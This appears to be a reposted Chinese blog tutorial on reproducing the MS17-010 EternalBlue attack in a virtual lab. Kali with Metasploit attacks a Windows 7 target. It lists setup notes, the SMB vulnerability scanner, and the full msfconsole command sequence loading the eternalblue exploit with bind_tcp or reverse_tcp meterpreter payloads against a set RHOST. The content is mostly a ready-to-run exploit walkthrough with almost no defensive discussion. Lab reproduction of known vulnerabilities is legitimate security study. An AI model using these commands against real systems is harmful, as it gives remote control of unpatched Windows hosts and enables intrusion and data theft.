码迷,mamicode.com
首页 > 其他好文 > 详细

MS17-010永恒之蓝验证

时间:2017-12-21 23:02:38      阅读:277      评论:0      收藏:0      [点我收藏+]

标签:color   反向   ges   攻击   访问   detail   es2017   验证   等等   

一、安装MSF,windows下安装也可以,直接安装kali也可以,我是kali是攻击主机,win7是靶机,都在虚拟机里。

1、windows下安装MSF请参考:http://blog.csdn.net/wangsy0202/article/details/51914748(https://www.metasploit.com/官网下载)

2、kali的安装请直接去官网下载:https://www.kali.org/downloads/

3、漏洞攻击文章请参考:https://bbs.ichunqiu.com/thread-23115-1-1.html

准备时候还是要说一下注意事项:

(1)请安装相关ruby插件:

安装过程是:打开msfconsole 然后输入命令:

1 gem install ruby_smb

(2)一定要搞清楚win7主机防火墙和共享服务配置445需要open 

(3)网络环境要搞清楚,是否有访问策略 是否有域认证等等,想明白了就像谁能发起连接。

#攻击机可以主动发起连接,请使用正向payload windows/x64/meterpreter/bind_tcp

#双向都可以主动发起连接的,请随意。(反向的windows/x64/meterpreter/reverse_tcp)

#双向都不可以的,或者攻击机不可以的那就别玩了。

(4)可以先扫描看看是否有漏洞

1 use auxiliary/scanner/smb/smb_ms17_010
2 set RHOSTS [targetip]
3 run

 

二、开始攻击:

1 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue 
2 msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp 
3 msf exploit(ms17_010_eternalblue) > set RHOST 192.168.177.129
4 msf exploit(ms17_010_eternalblue) > set LHOST 192.168.177.135
5 msf exploit(ms17_010_eternalblue) > exploit

 技术分享图片

 

技术分享图片

 搞定收工

MS17-010永恒之蓝验证

标签:color   反向   ges   攻击   访问   detail   es2017   验证   等等   

原文地址:http://www.cnblogs.com/KevinGeorge/p/8082570.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!